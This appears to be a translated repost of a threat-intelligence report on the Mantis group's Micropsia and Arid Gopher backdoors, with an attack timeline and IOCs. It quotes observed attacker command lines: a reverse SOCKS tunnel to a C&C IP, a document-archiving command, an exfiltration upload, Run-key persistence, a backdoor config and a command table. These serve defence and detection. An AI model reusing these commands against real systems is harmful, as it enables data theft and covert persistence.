background
Mantis has been active since 2014, and some third-party reports indicate it may have been active as early as 2011. The group is known for targeting organizations in Israel and a number of other Middle Eastern countries. Target areas include government, military, finance, media, education, energy and think tanks. The group is known for using phishing emails and fake social media profiles to trick targets into installing malware on their devices.
Mantis are widely believed to have ties to the Palestinian territories. Symantec was unable to make clear attributions to any Palestinian organization, although other vendors linked the group to Hamas.
In its latest attack, the group used updated versions of its custom Micropsia and Arid Gopher backdoors to infect targets, followed by widespread credential theft and exfiltration of stolen data.
attack chain
The initial route of infection at this event is unclear. In one targeted organization, the attackers deployed three different versions of the same toolset (i.e., different variations of the same tools) on three groups of computers. Isolating the attack in this way is most likely a preventive measure. If one of these toolsets is discovered, the attacker will still be able to maintain a persistent presence on the target network.
The following is a description of the use of one of the three toolsets:
Malicious activity was first detected on December 18, 2022. Three separate sets of obfuscated PowerShell commands were executed to load a Base64-encoded string that launched the embedded shellcode. The shellcode is a 32-bit bootloader that uses basic TCP protocol to download another stage from the command and control (C&C) server: 104.194.222[.]50 port 4444.
The attackers returned on December 19, first performing a credential dump and then using Certutil and BITSAdmin to download the Micropsia backdoor and Putty, a publicly available SSH client.
Micropsia then executes and begins contacting the C&C server. On the same day, Micropsia was also executed on three other machines in the same organization. In each case, it runs in a folder named after its file name:
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
On a computer, Micropsia is used to set up a reverse socks tunnel to an external IP address:
CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.]50:443 [REDACTED]
On December 20, Micropsia was used to run an unknown executable file called windowspackages.exe on one of the infected computers.
The next day, December 21, RAR was executed to archive files on another infected computer.
From December 22 to January 2, 2023, Micropsia was used to execute the Arid Gopher backdoor on three infected computers. The Arid Gopher is in turn used to run a tool called SetRegRunKey.exe, which provides persistence by adding the Arid Gopher in the registry to execute across reboots. It also ran an unknown file called localsecuritypolicy.exe (the attackers used this filename elsewhere as the Arid Gopher backdoor).
On December 28, Micropsia was used to run windowspackages.exe on three additional infected computers.
On December 31, Arid Gopher executed two unknown files named networkswitcherdatamodell.exe and networkuefidiagsbootserver.exe on two infected computers.
By January 2, the attackers deactivated the version of Arid Gopher they were using and introduced a new variant. Is this because the first version was discovered, or the standard operating procedure is unclear.
On January 4, Micropsia was used to execute two unknown files, both named hostupbroker.exe, from the folder: csidl_common_appdata\hostupbroker\hostupbroker.exe on a single computer. This is followed by the leak of the RAR file:
CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar
On January 9, Arid Gopher was used to execute two unknown files on a single computer:
csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
csidl_common_appdata\embededmodeservice\embededmodeservice.exe
The last malicious activity occurred after January 12, when Arid Gopher was used to execute an unknown file named localsecuritypolicy.exe every ten hours.
Micropsia
The Micropsia backdoor variant used in these attacks appears to be a slightly updated version of the version seen by other vendors. In this event, Micropsia deployed using multiple filenames and file paths:
csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
csidl_common_appdata\microsoftservicesusermanual\systempropertiesinternationaltime.exe
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
Micropsia executes using WMI and its main purpose appears to be to run the attacker's secondary payload. These include:
Arid Gopher (File name: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
Reverse SOCKs Tunneler (aka Revsocks) (File name: windowsservicemanageav.exe)
Data exfiltration tool (file name: windowsupserv.exe)
Two unknown files, both named hostupbroker.exe
Unknown file named windowspackages.exe
In addition to this, Micropsia has its own features such as screenshots, keylogging, and the use of WinRAR to archive certain file types in preparation for data exfiltration:
"%PROGRAMDATA%\Software Distributions\WinRAR\Rar.exe" ar -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 "%PRO GRAMDATA%\Software Distributions\Bdl\LMth__C_2023-02-13 17-14-41” “%USERPROFILE%*.xls” “%USERPROFILE%*.xlsx” “%USERPROFILE%*.doc” “%USERPROFILE%*.docx” “%USERPROFILE%*.csv” “%USERPROFILE%*.pdf” “%USERPROFILE%*.ppt” “%USERPROFILE %*.pptx” “%USERPROFILE%*.odt” “%USERPROFILE% *.mdb” “%USERPROFILE%*.accdb” “%USERPROFILE%*.accde” “%USERPROFILE%*.txt” “%USERPROFILE%*.rtf” “%USERPROFILE%*.vcf”
Arid Gopher
Arid Gopher is different from Micropsia, which is written in Delphi. Arid Gopher is written in Go language. The version of Arid Gopher used in this event contains the following embedded components:
7za.exe – a copy of a legitimate 7-Zip executable
AttestationWmiProvider.exe – A tool for setting the “run” registry value
ServiceHubIdentityHost.exe – A copy of Optimum X’s legitimate Shortcut.exe executable
Setup.env – Configuration file
Arid Gopher was also used to launch the following unknown files: networkswitcherdatamodell.exe, localsecuritypolicy.exe, and networkuefidiagsbootserver.exe. In addition, it was used to download and execute files obfuscated using PyArmor.
When communicating with the C&C server, the Arid Gopher registers the device on one path and then connects to another path, presumably to receive commands:
Connect to: http://jumpstartmail[.]com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]134) – possibly to register the device
Next is: http://jumpstartmail[.]com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – probably to receive commands
Connect to: http://salimafia[.]net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]32) – possibly to register the device
Next is: http://salimafia[.]net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – probably to receive commands
Arid Gopher appears to be regularly updated and rewritten by attackers, most likely to evade detection. One variant of the malware differs sufficiently from the previous version's unique code that no subroutine contains the same unique code as the previous version. Mantis seems to actively shift logic between variants, which is a time-consuming operation if done manually.
| Command | Description |
|---|---|
| "c" | Perhaps related to main.exC("cmd") |
| "d" | Perhaps related to main.down2 |
| "s" | Perhaps related to main.OnDSH |
| "ci" | Perhaps related to main.deviceProperties |
| "ps" | Perhaps related to main.exC("powershell") |
| "ra" | Perhaps related to main.RunAWithoutW |
| "sf" | Perhaps related to main.updateSettings |
| "sl" | Perhaps related to main.searchForLogs |
| "ua" | Perhaps related to main.updateApp |
| "ut" | Perhaps related to main.updateT |
| "pwnr" | Perhaps related to main.exCWithoutW("powershell") |
| "rapp" | Perhaps related to main.restartApp |
| "gelog" | Perhaps related to main.upAppLogs |
| "ufbtt" | Perhaps related to main.collectFi |
| "ufofd" | Perhaps related to main.collectFiOrFol |
| "bwp" | Perhaps related to main.browDat |
| "cbh" | Perhaps related to main.delBD |
| "cwr" | Perhaps related to main.exCWithoutW("cmd") |
| "gaf" | Perhaps related to main.collectFi |
| "ntf" | Perhaps related to main.collectNet |
| "smr" | Perhaps related to main.updateSettings |
The embedded setup.env file is used by an analyzed Arid Gopher variant to retrieve configuration data and contains the following content:
DIR=WindowsPerceptionService
ENDPOINT=http://jumpstartmail[.]com/IURTIER3BNV4ER
LOGS=logs.txt
DID=code.txt
VER=6.1
EN=2
ST_METHOD=r
ST_MACHINE=false
ST_FLAGS=x
COMPRESSOR=7za.exe
DDIR=ResourcesFiles
BW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002
SERVER_TOKEN=PDqMKZ91l2XDmDELOrKB
STAPP=AttestationWmiProvider.exe
SHORT_APP=ServiceHubIdentityHost.exe
The setup.env configuration file mentions another file, AttestationWmiProvider.exe, also embedded in the Arid Gopher. This file is a 32-bit executable that acts as a helper, ensuring that another executable runs on reboot. When it executes, it checks the following command line parameters:
"key" with string parameter [RUN_VALUE_NAME]
"value" with string parameter [RUN_PATHNAME]
It then arranges to receive signal notifications using func os/signal.Notify(). Once notified, it sets the following registry value:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”[RUN_VALUE_NAME]” = “[RUN_PATHNAME]”
Our investigation so far shows that this file sets Arid Gopher to run on reboot:
CSIDL_COMMON_APPDATA\attestationwmiprovider\attestationwmiprovider.exe -key=NetworkVirtualizationStartService “-value=CSIDL_COMMON_APPDATA\networkvirtualizationstartservice\networkvirtualizationstartservice.exe -x”
Data Breach Tools
The attackers also used a custom tool to exfiltrate data stolen from target organizations: a 64-bit PyInstaller executable named WindowsUpServ.exe. When run, the tool checks the following command line parameters:
“-d” “[FILE_DIRECTORY]”
"-f" "[FILENAME]"
For each "-f" "[FILENAME]" command line argument, the tool uploads the contents of [FILENAME]. For each "-d" "[FILE_DIRECTORY]" command line argument, the tool gets the list of files stored in the folder [FILE_DIRECTORY] and uploads the contents of each file.
When each file is uploaded, the tool sends an HTTP POST request to the C&C server with the following parameters:
"kjdfnqweb": [THE_FILE_CONTENT]
"qyiwekq": [HOSTNAME_OF_THE_AFFECTED_COMPUTER]
Whenever the remote server responds with status code 200, the malware deletes the uploaded files from the local disk. Malware may also log some of its behavior in the following files:
"C:\ProgramData\WindowsUpServ\success.txt"
"C:\ProgramData\WindowsUpServ\err.txt"
a staunch opponent
Mantis appears to be a determined adversary willing to invest time and effort to maximize its chances of success, as evidenced by its extensive malware rewrites and its splitting attacks against individual organizations into separate parts to reduce detection of the entire operation. The opportunity to arrive can be seen.
IOC indicator
| SHA256 hash | File name | Description |
|---|---|---|
| 0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311 | networkvirtualizationservice.exe | Arid Gopher |
| 3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529 | networkvirtualizationpicservice.exe | Arid Gopher |
| 82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4 | networkvirtualizationfiaservice.exe | Arid Gopher |
| 85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097 | networkvirtualizationinithservice.exe | Arid Gopher |
| cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 | networkvirtualizationfiaservice.exe | Arid Gopher |
| f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8 | networkvirtualizationstartservice.exe | Arid Gopher |
| 21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 | AttestationWmiProvider.exe | Arid Gopher persistence component |
| 58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724 | windowsupserv.exe | Exfiltration tool |
| 5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e | windowsupserv.exe | Exfiltration tool |
| 0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 | Various | Micropsia |
| 1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa | N/A | Micropsia |
| 211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d | xboxaccessorymanagementservice.exe | Micropsia |
| d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798 | systempropertiesinternationaltime.exe | Micropsia |
| 5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4 | networkvirtualizationseoservice.exe | Possible Arid Gopher |
| f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203 | runme.exe | Possible Meterpreter |
| c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b | systempropertiesinternationaltime.exe | Possible Micropsia |
| f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb | windowsservicemanageav.exe | ReverseSocksTunnel |
| 411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299 | N/A | Shellcode |
| 5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d | N/A | Shellcode |
| 6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 | N/A | Shellcode |
| 11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e | SystemPropertiesInternationalTime.rar | Unknown file |
| 1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6 | networkswitcherdatamodell.exe | Unknown file |
| 220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c | hostupbroker.exe | Unknown file |
| 4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f | hostupbroker.exe | Unknown file |
| 4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 | windowspackages.exe | Unknown file |
| 624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689 | _pytransform.dll | Unknown file |
| 7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4 | embeddedmodeservice.exe | Unknown file |
| 8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2 | localsecuritypolicy.exe | Unknown file |
| b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 | embeddedmodeservice.exe | Unknown file |
| bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51 | localsecuritypolicy.exe | Unknown file |
| bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9 | networkuefidiagsbootserver.exe | Unknown file |
| d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842 | teamviewrremoteservice.exe | Unknown file |
| jumpstartmail[.]com | Arid Gopher C&C | |
| paydayloansnew[.]com | Arid Gopher C&C | |
| picture-world[.]info | Arid Gopher C&C | |
| rnacgroup[.]com | C&C | |
| salimafia[.]net | Arid Gopher C&C | |
| seomoi[.]net | Arid Gopher C&C | |
| soft-utils[.]com | C&C | |
| chloe-boreman[.]com | Micropsia C&C | |
| criston-cole[.]com | Micropsia C&C | |
| http://5.182.39[.]44/esuzmwmrtajj/cmsnvbyawttf/mkxnhqwdywbu | Exfiltration tool C&C |
Original article, author: Chief Security Officer, if reprinted, please indicate the source: https://cncso.com/en/mantis-used-in-attacks-against-palestinian-targets.html
